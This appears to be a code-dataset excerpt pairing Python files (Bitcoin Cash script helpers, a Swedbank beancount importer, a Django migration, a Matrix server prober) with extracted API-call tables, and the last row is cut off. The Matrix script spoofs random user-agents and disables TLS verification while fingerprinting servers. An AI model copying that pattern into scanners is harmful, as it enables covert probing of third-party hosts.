code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
import pdb
import sys
from binascii import hexlify, unhexlify
import hashlib
import bchscript.bchopcodes as bchopcodes
import bchscript.cashaddrutil as cashaddrutil
import bchscript.errors as err
if not "BCH_ADDRESS_PREFIX" in globals(): # don't initialize twice
BCH_ADDRESS_PREFIX = None
BCH_TESTNET = "bchtest:"
BCH_MAINNET = "bitcoincash:"
BCH_REGTEST = "bchreg:"
BCH_ANYNET = None
def ScriptifyData(tmp):
if type(tmp) is list:
ret = []
for t in tmp:
ret.append(ScriptifyData(t))
return b"".join(ret)
if 1:
ret = []
if type(tmp) is str:
tmp = bytes(tmp,"utf-8")
l = len(tmp)
if l == 0: # push empty value onto the stack
ret.append(bytes([0]))
elif l <= 0x4b:
ret.append(bytes([l])) # 1-75 bytes push # of bytes as the opcode
ret.append(tmp)
elif l < 256:
ret.append(bytes([bchopcodes.opcode2bin["OP_PUSHDATA1"]]))
ret.append(bytes([l]))
ret.append(tmp)
elif l < 65536:
ret.append(bytes([bchopcodes.opcode2bin["OP_PUSHDATA2"]]))
ret.append(bytes([l & 255, l >> 8])) # little endian
ret.append(tmp)
else: # bigger values won't fit on the stack anyway
assert 0, "cannot push %d bytes" % l
return b"".join(ret)
def ScriptifyNumber(num):
if num == 0:
return bytes([0])
elif num < 17:
return bytes([num+0x80])
elif num < 256:
return ScriptifyData(bytes([num]))
elif num < 65536:
return ScriptifyData(num.to_bytes(2, byteorder="little"))
elif num < (1<<32):
return ScriptifyData(num.to_bytes(4, byteorder="little"))
else:
return ScriptifyData(num.to_bytes(8, byteorder="little"))
def sha256(msg):
"""Return the sha256 hash of the passed data. Non binary data is automatically converted
>>> hexlify(sha256("e hat eye pie plus one is O"))
b'c5b94099f454a3807377724eb99a33fbe9cb5813006cadc03e862a89d410eaf0'
"""
msg = anything2bytes(msg)
return hashlib.new('sha256', msg).digest()
def hash256(s):
"""Return the double SHA256 hash (what bitcoin typically uses) of the passed data. Non binary data is automatically converted
>>> hexlify(hash256("There was a terrible ghastly silence".encode()))
b'730ac30b1e7f4061346277ab639d7a68c6686aeba4cc63280968b903024a0a40'
"""
return sha256(sha256(s))
def hash160(msg):
"""RIPEME160(SHA256(msg)) -> bytes"""
h = hashlib.new('ripemd160')
msg = anything2bytes(msg)
h.update(hashlib.sha256(msg).digest())
return h.digest()
def blake2b(msg, len=32):
msg = anything2bytes(msg)
return hashlib.blake2b(msg, digest_size=len).digest()
def listify(obj):
"""wrap a list around something, if it is not currently a list"""
if type(obj) is list:
return obj
return [obj]
def templatedJoin(listOfData):
ret = [b""]
# join binary strings, preserve other types as separate items
for l in listOfData:
if type(l) is bytes and type(ret[-1]) is bytes:
ret[-1] = ret[-1] + l
else:
ret.append(l)
# strip off the list if there is not template
if len(ret) == 1 and type(ret[0]) is bytes:
ret = ret[0]
return ret
def applyTemplate(template, **kwargs):
if type(template) is bytes: # its already raw bytes, nothing to do
return template
applied = []
for t in template:
if type(t) is str:
if t[0] is '$':
t = kwargs.get(t[1:], t) # Use the binding or the name if there is no binding
applied.append(t)
elif t[0] is '@':
applied.append(t)
else:
raise err.Output("bad template")
else:
applied.append(t)
return applied
def script2bin(opcodes, showSatisfierItems=True, showTemplateItems=True):
"""Convert a program to a binary string"""
if not type(opcodes) is list:
opcodes = [opcodes]
ret = []
for opcode in opcodes:
s = None
if type(opcode) is str:
if opcode[0] == "@": # its an existing stack arg, so no-op
s = opcode
elif opcode[0] == "$": # its an existing stack arg, so no-op
s = opcode
else:
ret.append(opcode.encode("utf-8"))
# serialize object to bytes
elif hasattr(opcode, "scriptify"):
s = opcode.scriptify()
elif hasattr(opcode, "serialize"):
s = opcode.serialize()
elif type(opcode) is int:
s = ScriptifyNumber(opcode)
elif type(opcode) is bytes: # encode the command to push data onto stack, then the data
s = ScriptifyData(opcode)
else:
assert 0, "Not fully compiled: %s" % opcode
if type(s) is str:
if s[0] == "@": # its an existing stack arg, so no-op
if showSatisfierItems:
ret.append(s)
elif s[0] == "$": # its an existing stack arg, so no-op
if showTemplateItems:
ret.append(s)
else:
ret.append(opcode.encode("utf-8"))
else:
if not s is None:
ret.append(s)
return templatedJoin(ret)
def script2hex(opcodes):
"""Convert a program to a hex string suitable for RPC"""
return hexlify(script2bin(opcodes)).decode("utf-8")
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
obj.deserialize(BytesIO(unhexlify(hex_string.encode('ascii'))))
return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
if type(obj) is bytes:
return hexlify(obj).decode('ascii')
if type(obj) is str:
if obj[0] == '@': # include satisfier script inputs
return "_" + obj + "_"
if obj[0] == '$': # include template params
return "_" + obj + "_"
if type(obj) is list:
r = []
for i in obj:
if not i: # skip empty
continue
r.append(ToHex(i))
return "".join(r)
return hexlify(obj.serialize()).decode('ascii')
class InvalidAddress(Exception):
"""Raised on generic invalid base58 data, such as bad characters.
Checksum failures raise Base58ChecksumError specifically.
"""
pass
def bitcoinAddress2bin(btcAddress):
"""convert a bitcoin address to binary data capable of being put in a CScript"""
# chop the version and checksum out of the bytes of the address
if ":" in btcAddress:
pfx, addr = btcAddress.split(":")
decoded = cashaddrutil.b32decode(addr)
if not cashaddrutil.verify_checksum(pfx, decoded):
raise InvalidAddress('Bad cash address checksum')
converted = cashaddrutil.convertbits(decoded, 5, 8)
return bytes(converted[1:21]) # 0 is address type, last 6 are checksum
else:
return decodeBase58(btcAddress)[1:-4]
B58_DIGITS = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def decodeBase58(s):
"""Decode a base58-encoding string, returning bytes"""
if not s:
return b''
# Convert the string to an integer
n = 0
for c in s:
n *= 58
if c not in B58_DIGITS:
raise InvalidAddress('Character %r is not a valid base58 character' % c)
digit = B58_DIGITS.index(c)
n += digit
# Convert the integer to bytes
h = '%x' % n
if len(h) % 2:
h = '0' + h
res = unhexlify(h.encode('utf8'))
# Add padding back.
pad = 0
for c in s[:-1]:
if c == B58_DIGITS[0]:
pad += 1
else:
break
return b'\x00' * pad + res
def encodeBase58(b):
"""Encode bytes to a base58-encoded string"""
# Convert big-endian bytes to integer
n = int('0x0' + hexlify(b).decode('utf8'), 16)
# Divide that integer into bas58
res = []
while n > 0:
n, r = divmod(n, 58)
res.append(B58_DIGITS[r])
res = ''.join(res[::-1])
# Encode leading zeros as base58 zeros
czero = b'\x00'
if sys.version > '3':
# In Python3 indexing a bytes returns numbers, not characters.
czero = 0
pad = 0
for c in b:
if c == czero:
pad += 1
else:
break
return B58_DIGITS[0] * pad + res
def encodeBitcoinAddress(prefix, data):
data2 = prefix + data
cksm = hash256(data2)[:4]
data3 = data2 + cksm
b58 = encodeBase58(data3)
return b58
def anything2bytes(msg):
if type(msg) is int:
msg = bytes([msg])
if type(msg) is str:
msg = msg.encode("utf-8")
return msg
def reportBadStatement(tokens, n, symbols, printIt=True):
s = "ERROR: Bad statement or undefined symbol: %s\n" % tokens[n]
s+= " Known symbols: %s\n" % list(filter(lambda x: type(x) is str, symbols.keys()))
s+= " Context: %s\n" % tokens[n-10:n+10]
if printIt: print(s)
return s
def warn(s):
print(s, file=sys.stderr)
|
[
"binascii.hexlify",
"bchscript.cashaddrutil.verify_checksum",
"bchscript.cashaddrutil.convertbits",
"bchscript.cashaddrutil.b32decode",
"hashlib.sha256",
"hashlib.new",
"bchscript.errors.Output",
"hashlib.blake2b"
] |
[((2539, 2563), 'hashlib.new', 'hashlib.new', (['"""ripemd160"""'], {}), "('ripemd160')\n", (2550, 2563), False, 'import hashlib\n'), ((6778, 6806), 'bchscript.cashaddrutil.b32decode', 'cashaddrutil.b32decode', (['addr'], {}), '(addr)\n', (6800, 6806), True, 'import bchscript.cashaddrutil as cashaddrutil\n'), ((6948, 6987), 'bchscript.cashaddrutil.convertbits', 'cashaddrutil.convertbits', (['decoded', '(5)', '(8)'], {}), '(decoded, 5, 8)\n', (6972, 6987), True, 'import bchscript.cashaddrutil as cashaddrutil\n'), ((2100, 2126), 'hashlib.new', 'hashlib.new', (['"""sha256"""', 'msg'], {}), "('sha256', msg)\n", (2111, 2126), False, 'import hashlib\n'), ((2728, 2765), 'hashlib.blake2b', 'hashlib.blake2b', (['msg'], {'digest_size': 'len'}), '(msg, digest_size=len)\n', (2743, 2765), False, 'import hashlib\n'), ((6822, 6864), 'bchscript.cashaddrutil.verify_checksum', 'cashaddrutil.verify_checksum', (['pfx', 'decoded'], {}), '(pfx, decoded)\n', (6850, 6864), True, 'import bchscript.cashaddrutil as cashaddrutil\n'), ((2607, 2626), 'hashlib.sha256', 'hashlib.sha256', (['msg'], {}), '(msg)\n', (2621, 2626), False, 'import hashlib\n'), ((5840, 5852), 'binascii.hexlify', 'hexlify', (['obj'], {}), '(obj)\n', (5847, 5852), False, 'from binascii import hexlify, unhexlify\n'), ((3796, 3822), 'bchscript.errors.Output', 'err.Output', (['"""bad template"""'], {}), "('bad template')\n", (3806, 3822), True, 'import bchscript.errors as err\n'), ((8008, 8018), 'binascii.hexlify', 'hexlify', (['b'], {}), '(b)\n', (8015, 8018), False, 'from binascii import hexlify, unhexlify\n')]
|
#!/usr/bin/env python3
import datetime
import csv
import re
from decimal import Decimal
from beancount.ingest import importer
from beancount.core import data
from beancount.core.amount import Amount
VERSION = '0.1.3'
class CSVImporter(importer.ImporterProtocol):
ENCODING = 'iso-8859-15'
HEAD = re.compile(r'^\* Transaktioner Period ([0-9]{4}-[0-9]{2}-[0-9]{2}).([0-9]{4}-[0-9]{2}-[0-9]{2}) Skapad ([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}) ([+-][0-9]{2}:[0-9]{2}|CES?T)$')
FIELDS = ['Radnummer',
'Clearingnummer',
'Kontonummer',
'Produkt',
'Valuta',
'Bokföringsdag',
'Transaktionsdag',
'Valutadag',
'Referens',
'Beskrivning',
'Belopp',
]
def __init__(self, accounts, encoding=None, *args, **kwargs):
self.accounts = accounts
self.encoding = encoding or CSVImporter.ENCODING
super().__init__(*args, **kwargs)
def name(self):
return "SwebankImporter.vonshednob.github.com"
def file_date(self, file_):
with open(file_.name, 'rt', encoding=self.encoding) as fd:
match = CSVImporter.HEAD.match(fd.readline())
if not match:
raise RuntimeError()
return datetime.datetime.strptime(match.group(3), "%Y-%m-%d").date()
def file_account(self, file_):
with open(file_.name, 'rt', encoding=self.encoding) as fd:
fd.readline()
fd.readline()
reader = csv.reader(fd, delimiter=',', quotechar='"')
for row in reader:
return self.accounts.get(row[4], None)
return None
def identify(self, file_):
with open(file_.name, 'rt', encoding=self.encoding) as fd:
try:
line = fd.readline()
if not CSVImporter.HEAD.match(line):
return False
except:
pass
line = fd.readline().strip()
return line.startswith(','.join(CSVImporter.FIELDS))
return False
def extract(self, file_, previous=None):
transactions = []
with open(file_.name, 'rt', encoding=self.encoding) as fd:
fd.readline()
reader = csv.DictReader(fd, delimiter=',', quotechar='"')
for lineno, row in enumerate(reader):
meta = data.new_metadata(file_.name, lineno+2)
date = datetime.datetime.strptime(row['Valutadag'], "%Y-%m-%d").date()
account = self.accounts.get(row['Produkt'], None)
amount = Amount(Decimal(row['Belopp']), row['Valuta'])
payee = None
links = set()
tags = set()
narration = row['Beskrivning'].lower()
if row['Referens'].lower() != row['Beskrivning'].lower():
narration += " " + row['Referens'].lower()
postings = [
data.Posting(account,
amount,
None, # cost
None, # price
None, # flag
None, # meta
)
]
transaction = data.Transaction(meta,
date,
'*',
payee,
narration.title(),
tags,
links,
postings)
transactions.append(transaction)
return transactions
|
[
"csv.reader",
"decimal.Decimal",
"csv.DictReader",
"datetime.datetime.strptime",
"beancount.core.data.Posting",
"beancount.core.data.new_metadata",
"re.compile"
] |
[((309, 503), 're.compile', 're.compile', (['"""^\\\\* Transaktioner Period ([0-9]{4}-[0-9]{2}-[0-9]{2}).([0-9]{4}-[0-9]{2}-[0-9]{2}) Skapad ([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}) ([+-][0-9]{2}:[0-9]{2}|CES?T)$"""'], {}), "(\n '^\\\\* Transaktioner Period ([0-9]{4}-[0-9]{2}-[0-9]{2}).([0-9]{4}-[0-9]{2}-[0-9]{2}) Skapad ([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}) ([+-][0-9]{2}:[0-9]{2}|CES?T)$'\n )\n", (319, 503), False, 'import re\n'), ((1572, 1616), 'csv.reader', 'csv.reader', (['fd'], {'delimiter': '""","""', 'quotechar': '"""\\""""'}), '(fd, delimiter=\',\', quotechar=\'"\')\n', (1582, 1616), False, 'import csv\n'), ((2322, 2370), 'csv.DictReader', 'csv.DictReader', (['fd'], {'delimiter': '""","""', 'quotechar': '"""\\""""'}), '(fd, delimiter=\',\', quotechar=\'"\')\n', (2336, 2370), False, 'import csv\n'), ((2444, 2485), 'beancount.core.data.new_metadata', 'data.new_metadata', (['file_.name', '(lineno + 2)'], {}), '(file_.name, lineno + 2)\n', (2461, 2485), False, 'from beancount.core import data\n'), ((2669, 2691), 'decimal.Decimal', 'Decimal', (["row['Belopp']"], {}), "(row['Belopp'])\n", (2676, 2691), False, 'from decimal import Decimal\n'), ((3037, 3090), 'beancount.core.data.Posting', 'data.Posting', (['account', 'amount', 'None', 'None', 'None', 'None'], {}), '(account, amount, None, None, None, None)\n', (3049, 3090), False, 'from beancount.core import data\n'), ((2507, 2563), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (["row['Valutadag']", '"""%Y-%m-%d"""'], {}), "(row['Valutadag'], '%Y-%m-%d')\n", (2533, 2563), False, 'import datetime\n')]
|
# Generated by Django 3.0.5 on 2020-04-04 17:25
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Trend',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(auto_now_add=True)),
('data', models.TextField(blank=True)),
],
),
migrations.CreateModel(
name='Keyword',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=255)),
('trends', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='home.Trend')),
],
),
]
|
[
"django.db.models.TextField",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.DateField"
] |
[((334, 427), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (350, 427), False, 'from django.db import migrations, models\n'), ((451, 486), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (467, 486), False, 'from django.db import migrations, models\n'), ((514, 542), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)'}), '(blank=True)\n', (530, 542), False, 'from django.db import migrations, models\n'), ((676, 769), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (692, 769), False, 'from django.db import migrations, models\n'), ((793, 837), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)'}), '(blank=True, max_length=255)\n', (809, 837), False, 'from django.db import migrations, models\n'), ((867, 946), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""home.Trend"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='home.Trend')\n", (884, 946), False, 'from django.db import migrations, models\n')]
|
## Import modules
import dns
import json
import logging
import re
import requests
import ssl
import socket
import srvlookup
import urllib3
from fake_useragent import UserAgent
## Functions
def resolve_well_known(hostname):
"""Get delegated hostname and port from hostname
Try and look up the well-know server file for a hostname, then if this file exists return
the delegated hostname and port, or return an empty string if no well known server file exists.
Args:
hostname: A hostname as found in the Matrix ID.
Returns:
Delegated hostname and port in the format sub.domain.tld:port:wellknown
Or an empty string if no luck.
"""
# Set a random valid user-agent
ua = UserAgent()
headers = {'User-Agent': ua.random}
# Set well-known URL
well_known_url = f'https://{hostname}/.well-known/matrix/server'
# Try to downlad well-known server file
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
well_known_request = requests.get(well_known_url, headers=headers, allow_redirects=True, verify=False, timeout=3)
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.SSLError,
requests.exceptions.TooManyRedirects,
socket.timeout,
ssl.SSLCertVerificationError,
ssl.SSLError,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
return(None)
# If not 200
if not well_known_request.status_code == 200:
return(None)
# Try and decode json, then split domain.tld:port
try:
delegated_hostname, delegated_port = str(well_known_request.json()['m.server']).split(':')
# If converting to json fails it's probably a bitstream or something
except json.decoder.JSONDecodeError:
return(None)
except (ValueError, KeyError):
delegated_port = 443
else:
return(f'{delegated_hostname}:{delegated_port}:wellknown')
def resolve_srv(hostname):
"""Get delegated hostname and port from DNS SRV record
Try and look up the DNS SRV record for a hostname, then if this exists return
the delegated hostname, port and srv, or return an empty string if no well known server file exists.
Args:
hostname: A hostname as found in the Matrix ID.
Returns:
Delegated hostname and port in the format sub.domain.tld:port:srv
Or an empty string if no luck.
"""
# Turn off annoying logging to terminal from srv lookup
logger = logging.getLogger('srvlookup').setLevel(logging.CRITICAL)
logger = logger
# Try and look up SRV record
try:
srv = srvlookup.lookup('matrix', 'TCP', hostname)
# SRV lookup fail (except no record found)
except (srvlookup.SRVQueryFailure, UnicodeError, dns.name.LabelTooLong):
return(None)
# SRV lookup returns something
else:
# Successful SRV lookup
if 'Error querying SRV' not in srv[0]:
delegated_hostname = srv[0].hostname
delegated_port = srv[0].port
return(f'{delegated_hostname}:{delegated_port}:srv')
# Error quering
else:
return(None)
def resolve_delegated_homeserver(hostname):
"""Return delegated hostname and port from a hostname
Tries to looks up well-known server file, then SRV DNS record.
If both fail, return the arg hostname with assumed port 8448.
Args:
hostname: A hostname (the domain part of a Matrix ID).
Returns:
A string containing delegated hostname and port for the hostname in this format:
sub.domain.tld:port:server-resolve-type
"""
# If hostname is an ip
re_ipv4 = re.compile(r'((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))')
re_ipv6 = re.compile(r'((([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])))')
if re_ipv4.match(hostname) or re_ipv6.match(hostname):
return(f'{hostname}:8448:ip')
# If a well-known
temp = resolve_well_known(hostname)
if temp:
return temp
# If a srv
temp = resolve_srv(hostname)
if temp:
return temp
# Else, assume A or AAAA and assume port 8448
return(f'{hostname}:8448:a')
def https_download(hostname, path, port=443, raw=False):
"""Try and download something over https
Try and download something from https. Decode and return whatever it downloaded or return empty of download failed.
Args:
hostname: A hostname or an IP address.
path: What do download. For example /_matrix/static.
port: A port. Default 443.
raw: Return raw json data, assuming no errors. Defult False
Returns:
Some decoded content if there is some and not 404. If 404 or otherwise fail, return empty string.
"""
# Set a random valid user-agent
ua = UserAgent()
headers = {'User-Agent': ua.random}
# Set URL
url = f'https://{hostname}:{port}{path}'
# Try and download
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
http_request = requests.get(url, headers=headers, allow_redirects=True, verify=False, timeout=1)
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.SSLError,
requests.exceptions.TooManyRedirects,
socket.timeout,
ssl.SSLCertVerificationError,
ssl.SSLError,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
return(None)
# If not 200
if not http_request.status_code == 200:
return(None)
if raw:
return(http_request.json())
# Try and decode json, then split domain.tld:port
try:
delegated_hostname, delegated_port = str(http_request.json()['m.server']).split(':')
# If converting to json fails it's probably a bitstream or something
except json.decoder.JSONDecodeError:
return(None)
# Split on : fail due to no : being present, assume port 443
except ValueError:
return(f'{delegated_hostname}:443')
else:
return(f'{delegated_hostname}:{delegated_port}')
def check_matrix_server(hostname):
"""Check if and save there is a Synapse or Dendrite server on a url
Check if there is a Synapse or Dendrite server on a url:port. If there is a Synapse/Dendrite there,
look up IP and version.
Args:
hostname: Some URL from Matrix IDs in format sub.domain.com
Return:
A string with delegated hostname, IP, port and resolve type if the hostname is active.
Return None if not a Matrix server or server is dead.
"""
# Clean up hostname to exclude errors
hostname = hostname.strip()
hostname = hostname.replace('http://', '')
hostname = hostname.replace('https://', '')
if '!' in hostname:
hostname = hostname.replace('!', '')
_, hostname = hostname.split(':', 1)
if '?' in hostname:
hostname, _ = hostname.split('?', 1)
if '#' in hostname:
hostname = hostname.replace('#', '')
# If port is already known
port = None
if ':' in hostname:
hostname, port = hostname.split(':')
# Get delegated stuff
delegated_hostname, delegated_port, server_lookup_type = str(resolve_delegated_homeserver(hostname)).split(':')
if port:
delegated_port = port
# Set a random valid user-agent
ua = UserAgent()
headers = {'User-Agent': ua.random}
# Set version URL
version_url = f'https://{delegated_hostname}:{delegated_port}/_matrix/federation/v1/version'
# Try to downlad version
valid_ssl = True
try:
version_request = requests.get(version_url, headers=headers, allow_redirects=True, timeout=3)
# If ssl error
except (requests.exceptions.SSLError, ssl.SSLCertVerificationError, ssl.SSLError):
try:
version_request = requests.get(version_url, headers=headers, allow_redirects=True, verify=False, timeout=3)
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.TooManyRedirects,
socket.timeout,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
pass
valid_ssl = False
# If connection error
except (
dns.name.LabelTooLong,
NameError,
requests.exceptions.ConnectionError,
requests.exceptions.ConnectTimeout,
requests.exceptions.InvalidURL,
requests.exceptions.ReadTimeout,
requests.exceptions.SSLError,
requests.exceptions.TooManyRedirects,
socket.timeout,
ssl.SSLCertVerificationError,
ssl.SSLError,
UnicodeError,
urllib3.exceptions.ConnectTimeoutError,
urllib3.exceptions.MaxRetryError,
urllib3.exceptions.NewConnectionError
):
return(None)
# If not response code 200
try:
if not version_request.status_code == 200:
return(None)
except:
return(None)
# Try and decode json
try:
version_json = version_request.json()
# If converting to json fails it's probably a bitstream or something
except json.decoder.JSONDecodeError:
return(None)
# Get version data
else:
name = version_json['server']['name']
version = version_json['server']['version']
# Get the IP for the Matrix server
delegated_ip = socket.gethostbyname(delegated_hostname)
# Create ; separated string and return it
out_string = f'{hostname};{delegated_hostname};{delegated_ip};{delegated_port};{server_lookup_type};{name};{version};'
if valid_ssl:
out_string += 'yes'
else:
out_string += 'no'
return(out_string)
|
[
"fake_useragent.UserAgent",
"socket.gethostbyname",
"requests.get",
"srvlookup.lookup",
"urllib3.disable_warnings",
"logging.getLogger",
"re.compile"
] |
[((732, 743), 'fake_useragent.UserAgent', 'UserAgent', ([], {}), '()\n', (741, 743), False, 'from fake_useragent import UserAgent\n'), ((928, 995), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['urllib3.exceptions.InsecureRequestWarning'], {}), '(urllib3.exceptions.InsecureRequestWarning)\n', (952, 995), False, 'import urllib3\n'), ((4008, 4138), 're.compile', 're.compile', (['"""((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))"""'], {}), "(\n '((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))'\n )\n", (4018, 4138), False, 'import re\n'), ((4143, 4830), 're.compile', 're.compile', (['"""((([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])))"""'], {}), "(\n '((([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])))'\n )\n", (4153, 4830), False, 'import re\n'), ((5812, 5823), 'fake_useragent.UserAgent', 'UserAgent', ([], {}), '()\n', (5821, 5823), False, 'from fake_useragent import UserAgent\n'), ((5953, 6020), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['urllib3.exceptions.InsecureRequestWarning'], {}), '(urllib3.exceptions.InsecureRequestWarning)\n', (5977, 6020), False, 'import urllib3\n'), ((8632, 8643), 'fake_useragent.UserAgent', 'UserAgent', ([], {}), '()\n', (8641, 8643), False, 'from fake_useragent import UserAgent\n'), ((10972, 11012), 'socket.gethostbyname', 'socket.gethostbyname', (['delegated_hostname'], {}), '(delegated_hostname)\n', (10992, 11012), False, 'import socket\n'), ((1034, 1131), 'requests.get', 'requests.get', (['well_known_url'], {'headers': 'headers', 'allow_redirects': '(True)', 'verify': '(False)', 'timeout': '(3)'}), '(well_known_url, headers=headers, allow_redirects=True, verify=\n False, timeout=3)\n', (1046, 1131), False, 'import requests\n'), ((2949, 2992), 'srvlookup.lookup', 'srvlookup.lookup', (['"""matrix"""', '"""TCP"""', 'hostname'], {}), "('matrix', 'TCP', hostname)\n", (2965, 2992), False, 'import srvlookup\n'), ((6053, 6138), 'requests.get', 'requests.get', (['url'], {'headers': 'headers', 'allow_redirects': '(True)', 'verify': '(False)', 'timeout': '(1)'}), '(url, headers=headers, allow_redirects=True, verify=False,\n timeout=1)\n', (6065, 6138), False, 'import requests\n'), ((8894, 8969), 'requests.get', 'requests.get', (['version_url'], {'headers': 'headers', 'allow_redirects': '(True)', 'timeout': 